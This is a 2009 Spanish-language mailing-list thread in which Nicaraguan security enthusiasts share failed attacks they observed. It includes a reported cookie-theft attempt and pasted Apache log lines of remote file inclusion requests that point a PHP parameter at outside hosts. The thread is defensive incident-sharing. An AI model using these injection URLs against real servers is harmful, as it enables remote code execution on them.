Fail! Intentos de hack fallidos
16 views
Skip to first unread message
Noel Vargas
Feb 19, 2009, 10:57:17 AM2/19/09
to Seguridad Software Libre Nicaragua
Revisando hoy un sitio web me hallé el intento de alguien de robar los
cookies de los visitantes. Menos mal que el desarrollador de la
aplicación web saneó la salida de la base de datos y el javascript no
corre y se puede ver en toda su gloria.
Les dejo el URL:
http://www.fieldandstream.com/photos/gallery/kentucky/2007/09/50-best-guns-ever-made
Por si acaso, tengan su NoScript activo.
En mis logs del Apache, me hallé algunos intentos fallidos (sorpresa,
script kid! No es joomla!):
www.nicatech.com.ni/verarticulos.php?idArticulo=http://babycaleb.fortunecity.co.uk/index.htm?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://calebsbirth.pisem.su/index.htm?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://bikelove.hostinginfive.com/bike.htm?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://holegirl.eclub.lv/.images/pictureofme?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://0xg3458.hub.io/pb.php?
Qué se han hallado ustedes?
cookies de los visitantes. Menos mal que el desarrollador de la
aplicación web saneó la salida de la base de datos y el javascript no
corre y se puede ver en toda su gloria.
Les dejo el URL:
http://www.fieldandstream.com/photos/gallery/kentucky/2007/09/50-best-guns-ever-made
Por si acaso, tengan su NoScript activo.
En mis logs del Apache, me hallé algunos intentos fallidos (sorpresa,
script kid! No es joomla!):
www.nicatech.com.ni/verarticulos.php?idArticulo=http://babycaleb.fortunecity.co.uk/index.htm?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://calebsbirth.pisem.su/index.htm?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://bikelove.hostinginfive.com/bike.htm?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://holegirl.eclub.lv/.images/pictureofme?
www.nicatech.com.ni//verarticulos.php?idArticulo=http://0xg3458.hub.io/pb.php?
Qué se han hallado ustedes?
Norman Garcia Aguilar
Feb 19, 2009, 11:22:12 AM2/19/09
to seguridad-softwar...@googlegroups.com
2009/2/19 Noel Vargas <nva...@gmail.com>
Jejejeje, ya que comentas eso, lo mismo pasó con el sistema de registro del SFD-2008 :) quisieron "hackear" un sistema hecho en RoR creyendo que era joomla :)
--
Norman Garcia Aguilar
http://www.normangarcia.info/blog
Linux user # 444131
Ubuntu user # 15806
Noel Vargas
Mar 20, 2009, 2:46:46 PM3/20/09
to Seguridad Software Libre Nicaragua
Reply all
Reply to author
Forward
0 new messages